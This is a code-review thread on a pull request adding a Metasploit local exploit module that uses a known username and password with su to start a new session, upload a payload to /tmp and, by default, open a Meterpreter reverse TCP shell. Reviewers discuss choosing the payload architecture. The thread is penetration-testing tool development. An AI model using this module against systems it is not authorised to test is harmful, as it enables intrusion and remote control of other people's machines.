modules/exploits/linux/local/su_login.rb

```diff
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+    include Msf::Post::Linux
+    include Msf::Post::Linux::System
+    include Msf::Post::Unix
+    include Msf::Post::File
+    include Msf::Exploit::FileDropper
+
+    Rank = NormalRanking
+
+    def initialize(info = {})
+        super(
+            update_info(info,
+                "Name"           => "Login to Another User with Su on Linux / Unix Systems",
+                "Description"    => "This module attempts to create a new login session by
+                                     invoking the su command of a valid username and password.
+
+                                     If the login is successful, a new session is created via
+                                     the specified payload.",
+                "License"        => MSF_LICENSE,
+                "Author"         => "Gavin Youker <youkergav@gmail.com>",
+                "DisclosureDate" => "Sep 10 2020",
+                "Platform"       => ["linux",  "unix"],
+                "Arch"           => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+                'Targets'        => [['Automatic', {}]],
+                "DefaultTarget"  => 0,
+                "DefaultOptions" => { "PAYLOAD" => "linux/x86/meterpreter/reverse_tcp" },
+                "SessionTypes"   => ["shell", "meterpreter"]
+            )
+        )
+
+        register_options([
+            OptString.new("USERNAME", [true, "Username to authenticate with."]),
+            OptString.new("PASSWORD", [true, "Password to authenticate with."])
+        ])
+
+        register_advanced_options([
+            OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+        ])
+    end
+
+    # Main function to run the exploit.
+    def exploit
+        fail_with(Failure::NoAccess, "username not found") unless user_exists(datastore["USERNAME"])
+
+        # Upload the payload and stager files.
+        print_status("Uploading payload to target")
+        payload_file = build_payload(payload.encoded_exe, datastore["WritableDir"])
```

Comment:
`encoded_exe` will automatically [select](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/encoded_payload.rb#L387) which executable architecture the payload will need to be converted to. When no specific option is passed to the method, this is done based on the target architecture, the top level module architecture or the payload architecture (in that order). Since this module has no specific targets, it will choose between the top level values and pick `ARCH_X86` by default:
```ruby
"Arch"           => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
```
This will obviously cause an issue when the target architecture is not x86.

One option would be to set one target per architecture. Note that you can also include a specific default payload for each target:
```ruby
                'Targets'        => [
                  [ 'Linux x86',        {
                    'Arch' => ARCH_X86,
                    "DefaultOptions" => { "PAYLOAD" => "linux/x86/meterpreter/reverse_tcp" },
                    }
                  ],
                  [ 'Linux x86_64',     {
                    'Arch' => ARCH_X64,
                    "DefaultOptions" => { "PAYLOAD" => "linux/x64/meterpreter/reverse_tcp" },
                    }
                  ],
                  [...]
```

Another option would be to pass the specific target to `encoded_exe` based on the host architecture. You will need to implement a logic to retrieve it (maybe with `session.arch` if it is a meterpreter session or `cmd_exec('uname -m')` for a shell session). Something along these lines:
```ruby
        host_arch = session.arch
        host_arch ||= case(cmd_exec('uname -m'))
                      when 'x86_64'
                        ARCH_X64
                      when 'x86'
                        ARCH_X86
                      when ...
                        ...
                      end
        payload_file = build_payload(payload.encoded_exe(arch: host_arch), datastore["WritableDir"])
```

Reply:
The typical approach used by most local exploit modules is to use `generate_payload_exe`.

```suggestion
        payload_file = build_payload(generate_payload_exe, datastore["WritableDir"])
```

This has a similar issue, in that it defaults to `ARCH_X86` by default, but is a code pattern more consistent with existing modules. This becomes a non-issue if the user selects an appropriate `payload`.

Reply:
Fixed. See commit 38fb6441696662d9aea17d95c8bc30021e002088

Reply:
Thanks for adding the targets, it looks good to me. I agree with @bcoles, `generate_payload_exe` would be more consistent with existing module.

Reply:
Replaced `payload.encoded_exe` with `generate_payload_exe`. See commit 9cf07e499fbf85f443b3a184b5356906f6be5376